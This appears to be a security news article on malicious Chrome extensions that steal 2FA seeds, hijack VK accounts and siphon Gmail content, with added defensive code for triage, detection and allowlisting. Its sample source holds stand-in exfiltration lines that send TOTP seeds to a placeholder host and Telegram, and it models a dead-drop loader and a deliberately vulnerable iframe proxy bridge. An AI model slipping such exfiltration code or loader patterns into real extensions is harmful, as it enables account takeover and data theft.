Three malicious Chrome extension campaigns have been uncovered: one steals Meta Business Suite data and 2FA seeds, one silently hijacks VKontakte accounts, and one uses fake AI assistants to siphon page and email content, together affecting well over half a million users.
Cybersecurity researchers have uncovered three major malicious Chrome extension campaigns that collectively reach well over half a million users, stealing sensitive business data, hijacking social media accounts, and exfiltrating email content through seemingly legitimate browser tools.
Meta Business Suite Data Theft
A malicious Chrome extension called CL Suite by @CLMasters (ID: jkphinfhmfkckkcnifhjiplhfoiefffl) has been discovered stealing data from Meta Business Suite and Facebook Business Manager users. Marketed as a tool to scrape Meta Business Suite data and generate 2FA codes, the extension has 33 users and was first uploaded to the Chrome Web Store on March 1, 2025.
The extension requests broad access to meta.com and facebook.com domains, claiming in its privacy policy that 2FA secrets and Business Manager data remain local. However, security researcher Kirill Boychenko revealed that the code transmits TOTP seeds, current one-time security codes, Meta Business "People" CSV exports, and Business Manager analytics data to infrastructure controlled by threat actors at getauth[.]pro, with optional forwarding to a Telegram channel.
By targeting Meta Business Suite and Facebook Business Manager users, the threat actor collects and exfiltrates this data without the victim's knowledge. The extension does not steal passwords directly, but it does not need to: an attacker who already holds a victim's password from an infostealer log or credential dump can use the exfiltrated TOTP seed to generate valid one-time codes indefinitely, not just the single code captured at the time, and complete the login.
The extension's full capabilities include:
- Stealing TOTP seeds and 2FA codes
- Extracting Business Manager "People" view data including names, email addresses, roles, and permissions
- Enumerating Business Manager-level entities and their linked assets
- Building CSV files of Business Manager IDs, attached ad accounts, connected pages, and billing configurations
Despite the low number of installs, Socket warned that the extension provides enough information for threat actors to identify high-value targets and mount follow-on attacks.
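The traits described in this section (broad host access to Meta domains, code that handles TOTP material, and outbound calls to hosts the extension never declared, Telegram included) are all visible in a static read of an unpacked extension. The following triage script is an added example, not CL Suite's code and not Socket's tooling; the manifest and source snippet it inspects are constructed stand-ins that exhibit those traits, and the hostnames in them are placeholders.

```javascript
// Added triage script (not CL Suite's code, not Socket's tooling): static checks an
// analyst runs over an UNPACKED extension to surface the traits described above.
// The manifest and source snippet are CONSTRUCTED stand-ins that exhibit those traits.

const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: "Example Business Helper",
  version: "1.0.0",
  permissions: ["storage", "tabs", "scripting"],
  host_permissions: ["https://*.facebook.com/*", "https://*.meta.com/*"],
  background: { service_worker: "bg.js" },
};

const SAMPLE_SOURCE = `
const totpSecret = localStorage.getItem('totp_seed');
const code = generateTOTP(totpSecret);
fetch('https://collector.example-exfil.test/api/ingest', { method: 'POST',
  body: JSON.stringify({ seed: totpSecret, code, people: peopleCsv }) });
fetch('https://api.telegram.org/bot' + token + '/sendMessage?chat_id=' + chat);
`;

// Hosts the extension legitimately needs, derived from its own host_permissions.
function declaredHosts(manifest) {
  return [...(manifest.host_permissions || []), ...(manifest.permissions || [])]
    .filter(p => p === "<all_urls>" || /^(\*|https?):\/\//.test(p))
    .map(p => (p === "<all_urls>" ? "*" : p.replace(/^(\*|https?):\/\//, "").split("/")[0]));
}

// Chrome host-pattern matching, reduced to what is needed here: "*.example.com"
// covers example.com and its subdomains, "*" covers everything.
function hostMatches(hostname, pattern) {
  if (pattern === "*") return true;
  if (pattern.startsWith("*.")) {
    const base = pattern.slice(2);
    return hostname === base || hostname.endsWith("." + base);
  }
  return hostname === pattern;
}

function triageManifest(manifest) {
  const findings = [];
  const broad = declaredHosts(manifest).filter(h => h === "*" || /^\*\.(facebook|meta)\.com$/.test(h));
  if (broad.length) findings.push({ rule: "broad-host-access", evidence: broad });
  const sensitive = (manifest.permissions || []).filter(p =>
    ["tabs", "scripting", "cookies", "webRequest", "webNavigation"].includes(p));
  if (sensitive.length) findings.push({ rule: "sensitive-api-permission", evidence: sensitive });
  return findings;
}

// Generic heuristics, not signatures from any vendor report.
const SOURCE_RULES = [
  { rule: "totp-material", re: /\b(?:totp|otpauth|2fa)\w*/gi, pick: m => m[0] },
  { rule: "telegram-bot-api", re: /api\.telegram\.org\/bot/gi, pick: m => m[0] },
  { rule: "outbound-url", re: /fetch\(\s*['"`](https?:\/\/[^'"`]+)/gi, pick: m => m[1] },
];

function triageSource(source) {
  const findings = [];
  for (const { rule, re, pick } of SOURCE_RULES) {
    const hits = [...new Set([...source.matchAll(re)].map(pick))];
    if (hits.length) findings.push({ rule, evidence: hits });
  }
  return findings;
}

// URLs the code contacts whose host is not covered by any declared host pattern.
// Heuristic only: an MV3 service worker can reach other hosts without declaring
// them, which is exactly why undeclared endpoints deserve a second look.
function undeclaredEndpoints(manifest, source) {
  const patterns = declaredHosts(manifest);
  const urls = (triageSource(source).find(f => f.rule === "outbound-url") || { evidence: [] }).evidence;
  return urls.filter(u => !patterns.some(p => hostMatches(new URL(u).hostname, p)));
}

function triageExtension(manifest, source) {
  const manifestFindings = triageManifest(manifest);
  const sourceFindings = triageSource(source);
  const endpoints = undeclaredEndpoints(manifest, source);
  const touches2fa = sourceFindings.some(f => f.rule === "totp-material");
  return {
    manifestFindings, sourceFindings, undeclaredEndpoints: endpoints,
    // 2FA material plus an undeclared sink is the combination worth escalating.
    verdict: touches2fa && endpoints.length ? "escalate: possible 2FA exfiltration" : "review",
  };
}

console.log(JSON.stringify(triageExtension(SAMPLE_MANIFEST, SAMPLE_SOURCE), null, 2));
```

Run it over a real unpacked extension by loading its `manifest.json` and concatenated scripts in place of the two samples. A privacy policy that says "everything stays local" is not evidence; the presence of TOTP handling next to a sink outside the declared hosts is.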
VKontakte Account Hijacking Campaign
Security firm Koi Security discovered that approximately 500,000 VKontakte users have had their accounts silently hijacked through Chrome extensions masquerading as VK customization tools. Codenamed VK Styles, this large-scale campaign has been traced to a threat actor operating under the GitHub username 2vk.
The malware embedded in these extensions engages in active account manipulation through several mechanisms:
- Automatically subscribing users to the attacker's VK groups
- Resetting account settings every 30 days to override user preferences
- Abusing VK's Cross-Site Request Forgery (CSRF) tokens so that its forged requests pass VK's anti-CSRF protection and are accepted as the user's own
- Maintaining persistent control over hijacked accounts
The campaign primarily affects Russian-speaking users and those across Eastern Europe, Central Asia, and Russian diaspora communities globally. The malicious extensions include:
- VK Styles - Themes for vk.com (ID: ceibjdigmfbbgcpkkdpmjokkokklodmc)
- VK Music - audio saver (ID: mflibpdjoodmoppignjhciadahapkoch)
- Music Downloader - VKsaver (ID: lgakkahjfibfgmacigibnhcgepajgfdb)
- vksaver - music saver vk (ID: bndkfmmbidllaiccmpnbdonijmicaafn)
- VKfeed - Download Music and Video from VK (ID: pcdgkgbadeggbnodegejccjffnoakcoh)
A defining trait of this campaign is the use of a VK profile's HTML metadata tags as a "dead drop resolver": rather than hard-coding the next-stage URL in the extension package, where it could be spotted and blocked, the loader reads it from tags on a public profile page that the attacker can update at any time. The next-stage payload is hosted in a public GitHub repository named "-" associated with 2vk and consists of obfuscated JavaScript that is injected into every VK page victims visit.
Security researcher Ariel Cohen noted that the malware shows deliberate refinement with 17 commits between June 2025 and January 2026, demonstrating it's a maintained software project with version control, testing, and iterative improvements rather than sloppy malware.
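A dead-drop resolver is simple to write and just as simple to hunt for once you know the shape. The block below is an added model, not the campaign's code: the profile HTML, the `cfg:` marker and the base64 encoding are assumptions chosen to illustrate the mechanism (the page does not say how the real loader encodes the URL), the payload URL and its `example-owner` account are constructed, and the proxy log lines used for the detection side are constructed too.

```javascript
// Added model of the dead-drop resolver described above. Not the campaign's code:
// the profile HTML, the "cfg:" marker and base64 encoding are ASSUMPTIONS chosen to
// illustrate the mechanism, and the proxy log lines at the bottom are CONSTRUCTED.

// The URL the loader is meant to discover (constructed; mirrors the "-" repo name).
const PAYLOAD_URL = "https://raw.githubusercontent.com/example-owner/-/main/styles.js";
const MARKER = "cfg:";

// A public profile page whose meta description carries the encoded URL. To anyone
// not looking for the marker it is ordinary social-media markup.
const SAMPLE_PROFILE_HTML = `<!doctype html><html><head>
<meta property="og:title" content="VK Styles">
<meta name="description" content="${MARKER}${Buffer.from(PAYLOAD_URL).toString("base64")}">
<meta name="viewport" content="width=device-width">
</head><body><div class="profile">Themes for your page</div></body></html>`;

function parseMetaTags(html) {
  const tags = [];
  for (const m of html.matchAll(/<meta\b([^>]*)>/gi)) {
    const attrs = {};
    for (const a of m[1].matchAll(/([\w:-]+)\s*=\s*"([^"]*)"/g)) attrs[a[1].toLowerCase()] = a[2];
    tags.push(attrs);
  }
  return tags;
}

// What the loader does: find the marked tag, decode it, accept only an https URL.
function resolveDeadDrop(html) {
  for (const tag of parseMetaTags(html)) {
    const content = tag.content || "";
    if (!content.startsWith(MARKER)) continue;
    const decoded = Buffer.from(content.slice(MARKER.length), "base64").toString("utf8");
    try {
      const url = new URL(decoded);
      if (url.protocol === "https:") return url.href;
    } catch { /* not a URL: keep looking */ }
  }
  return null;
}

// What a defender does with proxy/telemetry logs: a request from an extension to a
// social profile, followed within seconds by a request to a raw code host, is the tell.
// Log format is constructed: "<ISO time> src=<initiator> GET <url>".
const PROFILE_HOSTS = new Set(["vk.com", "m.vk.com"]);
const PAYLOAD_HOSTS = new Set(["raw.githubusercontent.com", "gist.githubusercontent.com"]);

function parseLogLine(line) {
  const m = /^(\S+) src=(\S+) GET (\S+)$/.exec(line.trim());
  if (!m) return null;
  return { t: Date.parse(m[1]), src: m[2], url: m[3], host: new URL(m[3]).hostname };
}

function findDeadDropSequences(lines, windowSeconds = 10) {
  const events = lines.map(parseLogLine).filter(Boolean).sort((a, b) => a.t - b.t);
  const hits = [];
  for (let i = 0; i < events.length; i++) {
    const a = events[i];
    if (!PROFILE_HOSTS.has(a.host)) continue;
    // Same initiator, payload host, inside the time window.
    for (let j = i + 1; j < events.length && events[j].t - a.t <= windowSeconds * 1000; j++) {
      const b = events[j];
      if (b.src === a.src && PAYLOAD_HOSTS.has(b.host)) hits.push({ src: a.src, profile: a.url, payload: b.url });
    }
  }
  return hits;
}

const SAMPLE_LOG = [  // constructed: one extension-initiated dead-drop sequence, two ordinary tab requests
  "2026-01-10T12:00:00Z src=ext:exampleloaderid GET https://vk.com/id000001",
  "2026-01-10T12:00:02Z src=ext:exampleloaderid GET " + PAYLOAD_URL,
  "2026-01-10T12:00:05Z src=tab GET https://vk.com/feed",
  "2026-01-10T12:05:00Z src=tab GET https://raw.githubusercontent.com/someone/tool/main/README.md",
];

console.log("resolved:", resolveDeadDrop(SAMPLE_PROFILE_HTML));
console.log("sequences:", findDeadDropSequences(SAMPLE_LOG));
```

The detection keys on the initiator being an extension rather than a tab, because a person browsing vk.com and then GitHub is unremarkable; an extension background context doing both within seconds is not. Blocking `raw.githubusercontent.com` outright is rarely an option, which is why the sequence, not the host, is the signal.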
AI Assistant Data Exfiltration
LayerX researcher Natalie Zargarov discovered a coordinated campaign dubbed AiFrame, in which 32 browser add-ons advertised as artificial intelligence assistants have been installed by more than 260,000 users. Marketed for summarization, chat, writing, and Gmail assistance, the extensions share a dangerous architecture that siphons sensitive data.
Instead of implementing their core functionality locally, the extensions embed a remote, server-controlled interface inside extension-controlled surfaces. The extension thus acts as a privileged proxy: whatever the remote page asks for, the extension performs with its own permissions, giving the operator's infrastructure access to browser capabilities that an ordinary web page could never reach. The malicious extensions include:
- AI Assistant (ID: nlhpidbjmmffhoogcennoiopekbiglbp)
- Llama (ID: gcfianbpjcfkafpiadmheejkokcmdkjl)
- Gemini AI Sidebar (ID: fppbiomdkfbhgjjdmojlogeceejinadg)
- AI Sidebar (ID: djhjckkfgancelbmgcamjimgphaphjdl)
- ChatGPT Sidebar (ID: llojfncgbabajmdglnkbhmiebiinohek)
- AI Sidebar (ID: gghdfkafnhfpaooiolhncejnlgglhkhe)
- Grok (ID: cgmmcoandmabammnhfnjcakdeejbfimn)
- Asking Chat Gpt (ID: phiphcloddhmndjbdedgfbglhpkjcffh)
- ChatGBT (ID: pgfibniplgcnccdnkhblpmmlfodijppg)
- Chat Bot GPT (ID: nkgbfengofophpmonladgaldioelckbe)
- Grok Chatbot (ID: gcdfailafdfjbailcdcbjmeginhncjkb)
- Chat With Gemini (ID: ebmmjmakencgmgoijdfnbailknaaiffh)
- XAI (ID: baonbjckakcpgliaafcodddkoednpjgf)
- Google Gemini (ID: fdlagfnfaheppaigholhoojabfaapnhb)
- Ask Gemini (ID: gnaekhndaddbimfllbgmecjijbbfpabc)
- AI Letter Generator (ID: hgnjolbjpjmhepcbjgeeallnamkjnfgi)
- AI Message Generator (ID: lodlcpnbppgipaimgbjgniokjcnpiiad)
- AI Translator (ID: cmpmhhjahlioglkleiofbjodhhiejhei)
- AI For Translation (ID: bilfflcophfehljhpnklmcelkoiffapb)
- AI Cover Letter Generator (ID: cicjlpmjmimeoempffghfglndokjihhn)
- AI Image Generator Chat GPT (ID: ckneindgfbjnbbiggcmnjeofelhflhaj)
- Ai Wallpaper Generator (ID: dbclhjpifdfkofnmjfpheiondafpkoed)
- Ai Picture Generator (ID: ecikmpoikkcelnakpgaeplcjoickgacj)
- DeepSeek Download (ID: kepibgehhljlecgaeihhnmibnmikbnga)
- AI Email Writer (ID: ckicoadchmmndbakbokhapncehanaeni)
- Email Generator AI (ID: fnjinbdmidgjkpmlihcginjipjaoapol)
- DeepSeek Chat (ID: gohgeedemmaohocbaccllpkabadoogpl)
- ChatGPT Picture Generator (ID: flnecpdpbhdblkpnegekobahlijbmfok)
- ChatGPT Translate (ID: acaeafediijmccnjlokgcdiojiljfpbe)
- AI GPT (ID: kblengdlefjpjkekanpoidgoghdngdgl)
- ChatGPT Translation (ID: idhknpoceajhnjokpnbicildeoligdgh)
- Chat GPT for Gmail (ID: fpmkabpaklbhbhegegapfkenkmpipick)
Once installed, these extensions render a full-screen iframe overlay pointing to a remote domain (claude.tapnetic[.]pro). Because the behaviour lives on the server rather than in the package, the operator can add capabilities at any time without publishing a Chrome Web Store update, and so without the change ever being reviewed. When instructed by the iframe, the add-ons query the active browser tabs and invoke content scripts that extract readable article content using Mozilla's Readability library.
The extensions also support speech recognition, exfiltrating the resulting transcripts to remote pages. A smaller subset targets Gmail specifically, reading visible email content directly from the Document Object Model (DOM) when victims visit mail.google[.]com. When a Gmail-related feature such as an AI-assisted reply or summary is invoked, the extracted email content is transmitted to third-party backend infrastructure controlled by the extension operator, sending message text and contextual data off-device and outside Gmail's security boundary.
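The "privileged proxy" problem comes down to one `message` handler. The block below is an added illustration, not AiFrame's code: it shows the vulnerable bridge (an extension page that forwards whatever its remote iframe says to `chrome.tabs` and `chrome.scripting`) next to a hardened one, and drives both with the same requests. The window object, the `chrome.*` facade, the tab contents, the remote origin and the extension ID are constructed stand-ins, and the facade's calls are synchronous only so that the file runs in plain Node.

```javascript
// Added model of the "privileged proxy" architecture described above, alongside a
// hardened handler. Illustrative code, not AiFrame's; the window, the chrome.* facade
// and all tab contents are CONSTRUCTED stand-ins, and the chrome calls are synchronous
// only so that the file runs in plain Node (the real APIs return Promises).

function makeWindow() {
  const listeners = [];
  return {
    addEventListener: (type, fn) => { if (type === "message") listeners.push(fn); },
    dispatchMessage: (event) => listeners.forEach(fn => fn(event)),
  };
}

function makeFakeChrome(calls) {
  const tabs = [
    { id: 1, active: true,  url: "https://mail.google.com/mail/u/0/#inbox", text: "Re: payroll export attached" },
    { id: 2, active: false, url: "https://intranet.example/wiki",           text: "internal wiki page" },
  ];
  return {
    tabs: {
      query: (q = {}) => {
        calls.push("tabs.query");
        return tabs.filter(t => q.active === undefined || t.active === q.active).map(({ id, url }) => ({ id, url }));
      },
    },
    scripting: {
      executeScript: ({ target }) => {
        calls.push(`executeScript:${target.tabId}`);
        return [{ result: tabs.find(t => t.id === target.tabId).text }];
      },
    },
  };
}

function makeFrame(origin) {
  const inbox = [];
  return { origin, inbox, postMessage: (msg) => inbox.push(msg) };
}

// VULNERABLE: the extension page embeds a remote iframe and forwards whatever it says
// to privileged APIs. No origin check, caller-chosen tab IDs, wildcard reply target.
function installProxyBridge(win, chrome) {
  win.addEventListener("message", (event) => {
    const { cmd, args = {} } = event.data || {};
    let result = null;
    if (cmd === "tabs.query") result = chrome.tabs.query(args);
    if (cmd === "readTab") result = chrome.scripting.executeScript({ target: { tabId: args.tabId } })[0].result;
    event.source.postMessage({ cmd, result }, "*");
  });
}

// HARDENED: the UI ships inside the package, so the only trusted origin is the
// extension's own; other origins and unknown commands are dropped silently; the single
// exposed command acts on the tab the user is looking at, never on a caller-chosen one.
// A Map (not a plain object) keeps "constructor" and friends from resolving to a handler.
function installHardenedBridge(win, chrome, trustedOrigin) {
  const handlers = new Map([
    ["summarize.currentTab", () => {
      const [active] = chrome.tabs.query({ active: true, currentWindow: true });
      return active ? chrome.scripting.executeScript({ target: { tabId: active.id } })[0].result : null;
    }],
  ]);
  win.addEventListener("message", (event) => {
    if (event.origin !== trustedOrigin) return;
    const handler = handlers.get((event.data || {}).cmd);
    if (!handler) return;
    event.source.postMessage({ cmd: event.data.cmd, result: handler() }, trustedOrigin);
  });
}

// Drive both bridges with the same two requests from a remote, attacker-controlled frame.
const TRUSTED_ORIGIN = "chrome-extension://exampleextensionidabcdefghijkl";   // assumed id
function runRemoteFrameScenario(install) {
  const calls = [], win = makeWindow(), chrome = makeFakeChrome(calls);
  install(win, chrome, TRUSTED_ORIGIN);
  const remote = makeFrame("https://remote-ui.example");   // constructed remote origin
  for (const data of [{ cmd: "tabs.query" }, { cmd: "readTab", args: { tabId: 2 } }]) {
    win.dispatchMessage({ origin: remote.origin, source: remote, data });
  }
  return { calls, replies: remote.inbox };
}

// One legitimate request from the packaged UI against the hardened bridge.
function runTrustedScenario() {
  const calls = [], win = makeWindow(), chrome = makeFakeChrome(calls);
  installHardenedBridge(win, chrome, TRUSTED_ORIGIN);
  const ui = makeFrame(TRUSTED_ORIGIN);
  win.dispatchMessage({ origin: ui.origin, source: ui, data: { cmd: "summarize.currentTab" } });
  return { calls, replies: ui.inbox };
}

console.log("proxy bridge   :", JSON.stringify(runRemoteFrameScenario(installProxyBridge)));
console.log("hardened bridge:", JSON.stringify(runRemoteFrameScenario(installHardenedBridge)));
console.log("trusted UI     :", JSON.stringify(runTrustedScenario()));
```

When auditing an extension, the tell is the combination: an extension HTML page whose `<iframe src>` points at a remote host, plus a `message` listener in that page or its service worker that reaches `chrome.tabs`, `chrome.scripting` or `chrome.cookies`. Either alone can be legitimate; together they mean the remote server decides what the extension does with its permissions.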
Massive Browsing History Exfiltration
Adding to these concerns, a report by Q Continuum found a collection of 287 Chrome extensions that exfiltrate browsing history to data brokers. Together they have accumulated 37.4 million installations, roughly 1% of the global Chrome user base.
"It was shown in the past that Chrome extensions are used to exfiltrate user browser history that is then collected by data brokers such as Similarweb and Alexa," the researcher said.
Protection Recommendations
Given these risks, users should take a minimalist approach: install only the extensions they actually need, from official stores, after checking reviews and the permissions requested. Installed extensions should be audited periodically for signs of malicious behaviour or excessive permission requests.
Other ways users and organizations can ensure greater security include:
- Using separate browser profiles for sensitive tasks
- Implementing extension allowlisting to block malicious or non-compliant extensions
- Regularly reviewing extension permissions and removing unused ones
- Being cautious of extensions requesting broad website access
- Monitoring for unusual account activity or unauthorized subscriptions
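Two of the recommendations above are mechanical enough to script: checking an inventory of installed extension IDs against the IDs published in this article, and enforcing allowlisting through Chrome's `ExtensionSettings` enterprise policy. The block below is an added example, not vendor tooling; `ARTICLE_IOC_IDS` is transcribed from the lists on this page, while the installed inventory, the placeholder allowlisted ID and the blocked-install message are constructed.

```javascript
// Added defender tooling for the two mechanical recommendations above: check installed
// extension IDs against the IDs published in this article, and emit a Chrome
// ExtensionSettings policy that blocks everything but an allowlist. Not vendor code.
// ARTICLE_IOC_IDS is transcribed from this page; INSTALLED and the allowlist are CONSTRUCTED.

const ARTICLE_IOC_IDS = new Set([
  "jkphinfhmfkckkcnifhjiplhfoiefffl",                                     // CL Suite
  "ceibjdigmfbbgcpkkdpmjokkokklodmc", "mflibpdjoodmoppignjhciadahapkoch", // VK Styles campaign (5)
  "lgakkahjfibfgmacigibnhcgepajgfdb", "bndkfmmbidllaiccmpnbdonijmicaafn",
  "pcdgkgbadeggbnodegejccjffnoakcoh",
  "nlhpidbjmmffhoogcennoiopekbiglbp", "gcfianbpjcfkafpiadmheejkokcmdkjl", // AiFrame (32)
  "fppbiomdkfbhgjjdmojlogeceejinadg", "djhjckkfgancelbmgcamjimgphaphjdl",
  "llojfncgbabajmdglnkbhmiebiinohek", "gghdfkafnhfpaooiolhncejnlgglhkhe",
  "cgmmcoandmabammnhfnjcakdeejbfimn", "phiphcloddhmndjbdedgfbglhpkjcffh",
  "pgfibniplgcnccdnkhblpmmlfodijppg", "nkgbfengofophpmonladgaldioelckbe",
  "gcdfailafdfjbailcdcbjmeginhncjkb", "ebmmjmakencgmgoijdfnbailknaaiffh",
  "baonbjckakcpgliaafcodddkoednpjgf", "fdlagfnfaheppaigholhoojabfaapnhb",
  "gnaekhndaddbimfllbgmecjijbbfpabc", "hgnjolbjpjmhepcbjgeeallnamkjnfgi",
  "lodlcpnbppgipaimgbjgniokjcnpiiad", "cmpmhhjahlioglkleiofbjodhhiejhei",
  "bilfflcophfehljhpnklmcelkoiffapb", "cicjlpmjmimeoempffghfglndokjihhn",
  "ckneindgfbjnbbiggcmnjeofelhflhaj", "dbclhjpifdfkofnmjfpheiondafpkoed",
  "ecikmpoikkcelnakpgaeplcjoickgacj", "kepibgehhljlecgaeihhnmibnmikbnga",
  "ckicoadchmmndbakbokhapncehanaeni", "fnjinbdmidgjkpmlihcginjipjaoapol",
  "gohgeedemmaohocbaccllpkabadoogpl", "flnecpdpbhdblkpnegekobahlijbmfok",
  "acaeafediijmccnjlokgcdiojiljfpbe", "kblengdlefjpjkekanpoidgoghdngdgl",
  "idhknpoceajhnjokpnbicildeoligdgh", "fpmkabpaklbhbhegegapfkenkmpipick",
]);

// Chrome extension IDs are 32 characters drawn from a-p; anything else is a transcription error.
const ID_RE = /^[a-p]{32}$/;
function malformedIds(ids) { return [...ids].filter(id => !ID_RE.test(id)); }

// Installed IDs are the directory names under the profile's Extensions folder
// (e.g. ~/.config/google-chrome/Default/Extensions on Linux) or the IDs at chrome://extensions.
function scanInstalled(installedIds) {
  return installedIds.filter(id => ARTICLE_IOC_IDS.has(id));
}

// ExtensionSettings policy: "*" sets the default for every extension, per-ID entries
// override it. Deploy as JSON under /etc/opt/chrome/policies/managed/ on Linux, or via
// the equivalent registry / configuration-profile keys on Windows and macOS.
function buildExtensionSettingsPolicy(allowlistIds, forceInstallIds = []) {
  const policy = {
    "*": {
      installation_mode: "blocked",
      blocked_install_message: "Extensions are allowlisted; ask IT to review new ones.",  // constructed text
    },
  };
  for (const id of allowlistIds) policy[id] = { installation_mode: "allowed" };
  for (const id of forceInstallIds) policy[id] = {
    installation_mode: "force_installed",
    update_url: "https://clients2.google.com/service/update2/crx",   // Chrome Web Store update URL
  };
  return { ExtensionSettings: policy };
}

// Would this policy stop the given ID from being installed (or remove it if present)?
function policyBlocks(policyDoc, id) {
  const s = policyDoc.ExtensionSettings;
  const mode = (s[id] || s["*"] || {}).installation_mode || "allowed";
  return mode === "blocked" || mode === "removed";
}

const INSTALLED = [  // constructed inventory: one benign placeholder, two IDs from the article
  "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
  "ceibjdigmfbbgcpkkdpmjokkokklodmc",
  "fpmkabpaklbhbhegegapfkenkmpipick",
];
const POLICY = buildExtensionSettingsPolicy(["aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"]);

console.log("malformed IOC IDs:", malformedIds(ARTICLE_IOC_IDS));
console.log("matches in inventory:", scanInstalled(INSTALLED));
console.log(JSON.stringify(POLICY, null, 2));
```

An allowlist policy makes the per-ID blocklist almost redundant, which is the point: the 38 IDs above are only the ones that have been written up, and a default-deny policy covers the ones that have not. After deploying, confirm at `chrome://policy` that `ExtensionSettings` shows as applied without errors.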
The three campaigns collectively demonstrate how threat actors increasingly pass off data-harvesting browser extensions as legitimate tools and utilities in order to collect and exfiltrate sensitive data.
